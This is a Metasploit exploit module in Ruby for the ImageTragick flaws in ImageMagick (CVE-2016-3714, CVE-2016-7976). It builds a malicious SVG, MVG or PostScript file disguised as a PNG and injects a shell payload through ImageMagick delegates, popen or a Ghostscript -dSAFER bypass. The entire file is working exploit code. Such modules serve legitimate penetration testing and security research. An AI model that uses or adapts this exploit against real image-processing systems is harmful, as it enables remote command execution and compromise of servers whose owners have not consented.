1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::FILEFORMAT
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
16
        'Description' => %q{
17
          This module exploits a shell command injection in the way "delegates"
18
          (commands for converting files) are processed in ImageMagick versions
19
          <= 7.0.1-0 and <= 6.9.3-9 (legacy).
20

21
          Since ImageMagick uses file magic to detect file format, you can create
22
          a .png (for example) which is actually a crafted SVG (for example) that
23
          triggers the command injection.
24

25
          The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
26
          (discovered by taviso) to achieve RCE in the Ghostscript delegate.
27
          Ghostscript versions 9.18 and later are affected. This target is
28
          provided as is and will not be updated to track additional vulns.
29

30
          If USE_POPEN is set to true, a |-prefixed command will be used for the
31
          exploit. No delegates are involved in this exploitation.
32
        },
33
        'Author' => [
34
          'stewie',            # Vulnerability discovery
35
          'Nikolay Ermishkin', # Vulnerability discovery
36
          'Tavis Ormandy',     # Vulnerability discovery
37
          'wvu',               # Metasploit module
38
          'hdm'                # Metasploit module
39
        ],
40
        'References' => [
41
          %w[CVE 2016-3714],
42
          %w[CVE 2016-7976],
43
          %w[URL https://imagetragick.com/],
44
          %w[URL https://seclists.org/oss-sec/2016/q2/205],
45
          %w[URL https://seclists.org/oss-sec/2016/q3/682],
46
          %w[URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab],
47
          %w[URL https://github.com/ImageMagick/ImageMagick/commit/a347456],
48
          %w[URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669]
49
        ],
50
        'DisclosureDate' => '2016-05-03',
51
        'License' => MSF_LICENSE,
52
        'Platform' => 'unix',
53
        'Arch' => ARCH_CMD,
54
        'Privileged' => false,
55
        'Payload' => {
56
          'BadChars' => "\x22\x27\x5c" # ", ', and \
57
        },
58
        'Targets' => [
59
          ['SVG file', { template: 'msf.svg' }], # convert msf.png msf.svg
60
          ['MVG file', { template: 'msf.mvg' }], # convert msf.svg msf.mvg
61
          ['PS file', { template: 'msf.ps' }] # PoC from taviso
62
        ],
63
        'DefaultTarget' => 0,
64
        'Notes' => {
65
          'Stability' => [CRASH_SAFE],
66
          'SideEffects' => [],
67
          'Reliability' => [],
68
          'AKA' => ['ImageTragick'],
69
          'RelatedModules' => [
70
            'exploit/unix/fileformat/ghostscript_type_confusion',
71
            'exploit/multi/fileformat/ghostscript_failed_restore'
72
          ]
73
        }
74
      )
75
    )
76

77
    register_options([
78
      OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
79
      OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])
80
    ])
81
  end
82

83
  def exploit
84
    if target.name == 'SVG file'
85
      p = Rex::Text.html_encode(payload.encoded)
86
    else
87
      p = payload.encoded
88
    end
89

90
    file_create(template.sub('echo vulnerable > /dev/tty', p))
91
  end
92

93
  def template
94
    if datastore['USE_POPEN']
95
      t = 'popen'
96
    else
97
      t = 'delegate'
98
    end
99

100
    begin
101
      File.read(File.join(
102
        Msf::Config.data_directory, 'exploits', 'imagemagick', t,
103
        target[:template]
104
      ))
105
    rescue Errno::ENOENT
106
      fail_with(Failure::NoTarget, "Target has no #{t} support")
107
    end
108
  end
109
end
110

111